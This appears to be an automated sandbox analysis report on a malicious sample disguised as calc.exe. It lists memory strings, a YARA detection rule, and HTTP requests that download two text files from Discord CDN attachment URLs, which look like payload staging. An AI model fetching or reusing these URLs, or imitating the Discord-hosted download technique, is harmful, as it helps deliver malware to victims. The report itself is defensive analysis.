Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachme
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachmen
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachment
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076495
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764951
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8972237076495156
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/89722370764951560
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953181
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531812
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/8972285953181245
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/89722859531812455
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/a
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/as
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asc
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/asci
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_A
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_AR
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.t
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.tx
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.txt
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/897402450376536075/897465559711633408/8NMrqq.txt
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.comD8
Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
Source: global trafficHTTP traffic detected: GET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.com
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49706 version: TLS 1.2

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
Source: calc.exeJoe Sandbox Cloud Basic: Detection: malicious Score: 72Perma Link
Source: calc.exe, type: SAMPLEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.calc.exe.320000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.calc.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.254525892.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.254621493.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000002.293367777.00000000026D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253884839.0000000000322000.00000002.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000000.00000000.253255248.0000000002677000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: calc.exe PID: 2952, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: WerFault.exe PID: 5944, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
Source: calc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: calc.exeVirustotal: Detection: 54%
Source: calc.exeReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Users\user\Desktop\calc.exeJump to behavior
Source: calc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\calc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\calc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: unknownProcess created: C:\Users\user\Desktop\calc.exe 'C:\Users\user\Desktop\calc.exe'
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
Source: C:\Users\user\Desktop\calc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3100:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2952
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DC6.tmpJump to behavior
Source: classification engineClassification label: mal80.evad.winEXE@3/7@1/2
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\calc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: calc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: calc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: calc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb& source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb2 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb4 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdbh source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: rasadhlp.pdb~ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbT3Rm source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbHL source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb:0 source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: kDC:\Users\user\Desktop\calc.pdb source: calc.exe, 00000000.00000000.252775219.00000000006F8000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: winhttp.pdbZ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbMZ@ source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbd source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbG source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.260565634.0000000002F42000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbV source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
